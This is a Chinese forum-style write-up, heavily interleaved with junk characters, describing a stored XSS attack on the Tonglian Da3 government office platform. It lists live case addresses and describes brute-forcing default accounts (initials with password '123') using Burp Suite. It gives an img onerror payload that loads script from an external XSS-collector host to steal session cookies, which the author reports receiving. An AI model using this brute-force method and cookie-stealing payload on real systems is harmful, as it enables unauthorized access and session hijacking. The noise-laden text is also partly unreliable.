" Q1 R, F) ]; F" p) W9 P' y
3 m. ?' j. j2 \/ v* X7 Q5 ? 同联Da3协同办公平台后台通用储存型xss漏洞9 o+ P* o* y4 t) c* j* _
# X, _5 t% j& U
% z; R' a8 O. }* ~ I 平台简介:
; j, y. p9 w6 f" {+ v0 y0 N- f/ S
" Q& i' G$ s) P
' O- \/ \* |5 Q) U- f g; Z& c$ c- O
7 x1 h% g4 y% ^' F) N
1 z- w5 m& J5 I5 S9 V 3 K" J5 D/ I% M
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% U: B9 R9 y9 [7 d5 ]% o同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 f+ m0 l$ n7 k# N% o' p, D
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
; x7 h, }5 P/ h2 R+ Z/ A
+ P" V8 y8 b5 D R+ f
U2 p; V4 Q& ^
: V/ M6 t; r2 x, Q
[5 f9 J' Y5 g1 H
+ K3 B. M& u2 u z: Z' h" Y+ M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:$ ]- `& q8 c6 Z
5 a3 h! z& _) ^ 9 K! ^* W( L" M& m
: u# Z0 o9 g+ Z0 S* O) c% @# ]0 o
8 H( `7 \/ R" `" _, x, _
7 \. Y; y4 u% e5 ^. s7 z
http://1.1.1.1:7197/cap-aco/#(案例2-)8 h) D3 b( O1 p& o
& F b1 G6 @- i( y% {: ~# N. W
* A9 l' q$ v( h7 h% W
http://www.XXOO.com (案例1-官网网站)
! X. O& Y0 `. U
, p' {: [8 s( X; h# Q
. X2 I+ O+ y* l* N 漏洞详情:
3 f4 U% F) J8 d# [2 A5 M! O
+ `& b% N; Y8 ~- x- e: n
) X" R" F# g& `. ]8 V1 z 案例一、
8 o0 L2 _3 x- T+ Q9 Y7 C/ Y* A
- J2 c; N* O3 T2 [: j. D7 ~
& {3 \ S6 g+ s# W 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' ^. F3 b6 |6 S) n0 l& c) C5 P; g
/ L* N* L: G7 m2 p/ ?
0 o8 f$ \: i6 J) p8 n 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 {: Z# h; j& {$ l: m
3 N1 b! ^& a! `9 @/ l+ E
' G2 P5 n6 W$ W5 V( e% [+ w
7 Z. ^2 c" |; _7 c
2 {+ d$ S, d V/ _1 p6 o
* v1 U; }( ^8 |; T' e2 K( k
3 D$ N# Z. @5 ?9 F
+ W5 L8 K/ c2 r, P& z& \( [# s0 m
/ V) j5 ]8 i+ E* w" {8 y status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ! j9 w2 U4 u; v, {5 y7 G8 P L0 n
- S& e& {: {+ U) m$ ~+ t5 }
( Y" y1 H( S) [
7 @' e/ d: I7 y3 b9 B) }9 q6 o
& U$ G( C+ g: f6 q( q# z/ g ! Y7 @5 o) C! C4 t' Y" v) P
+ h+ h* A% N, Z) V/ p# p8 {
: U. R: D8 y) O4 L& Y% U4 k
7 i2 Q; G* U1 Z4 G7 y. G
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 & X# X& x1 {9 m$ L1 c
2 |* P% O' x- i- Y' a( g# b
6 M, @( z! O# a& ~! O% P
: Q6 R2 ?7 m% E+ i2 U
8 S* `8 A! e, P6 _
Q# h. _$ i) o0 P& o- B
<img src=x
! Y; C# A2 ]3 x, L; eonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: V& M3 h+ O6 L4 }0 }* [$ F0 n
6 I0 N4 S1 _- _ }$ I
- K1 e3 z0 `: p
. k9 q! p3 z; @
" V n9 o% U- m! C
0 h/ T* ^5 }5 h9 |$ _+ j3 K 然后发送,接收cookie如图: 6 S9 L) Z _9 t4 ?5 {& u/ j1 C
/ m" S0 O, f# H' V% }6 Y7 H
* n% N7 w; S; e, G- W6 R 6 @0 h$ _' W+ V. V/ i
. f$ M+ k2 i( ]8 S3 m0 V - U, D w, f( t" k9 B
0 x" k; ?) {2 M
) J" ?- g7 m( M& f( [
5 e" e- A7 S D# T2 g1 g
0 @! `) X2 q& x. y5 Y9 P
* c3 k2 [. T' V, S
; r. d; K" B. H# O/ Y
0 n' w+ k+ y+ B; q2 `+ g
5 n1 C5 H7 A9 m! G
1 \+ D# m8 g3 e3 \0 w
2 K6 N7 z5 W' k/ T" Q: S
( @" M& a4 d- B9 q+ A
; l& U0 f- Z" ]; L6 e
/ \- L% O+ \7 j/ w0 j3 B3 F# n- V7 w
) N5 {. @6 g# L. h7 V( k, ~
$ s2 e/ d1 @3 x( u
$ i2 ?# Y' \0 l
3 P0 j" e& R% o x7 I6 o* P
$ o1 q' [2 n$ c$ M$ B1 k
案例2、 , p# _; V* p7 Z, `
3 q. j4 ` K d2 F+ G % F& j6 F2 P3 E, b u# X: X
前面步骤都一样,下面看效果图:
: @0 x! ~! Z8 p: `5 R
# y+ A% g) D2 i3 g. ^. \ / f9 U# O4 O8 X, M) }
0 v5 K9 Y5 X3 m
% b U% s9 r/ G# U }; L % h* c0 J9 C# t1 \& m; V
0 X5 ]) l' X+ |
; d p, W5 I; D9 m' {8 D! L
' g9 i: B1 X3 ^/ S5 B8 ~
5 I+ c' g4 Q9 P. B8 h& a
$ X% Q- H4 s8 ~4 [/ `
7 B: |' \( x* T
) N+ J- _+ V, ~5 F# f& G
$ x( ] i2 v, i( b0 d
, ?( v8 V( [4 v9 E
, R/ l) [* Y/ h6 m
5 _% Q+ _' t0 i0 y
( v" k: C6 e; m- {7 r. N' g( F7 b5 g
' b. P. r* c2 l
* T% [/ d$ b9 f6 O0 Z
$ m' P" [) y* Y" a& b ( n( N6 f% {- c
+ h; Q& {% N7 a0 o . T' K& m6 I' q: Y7 p% {
- \8 r0 p9 {: X" Y* n8 Z
/ J7 i8 A. N5 `! K
* q- d, f6 ~( z+ \ ) M4 }& H4 E, i% q; O) l, l
# S3 a, b2 W4 p' P! c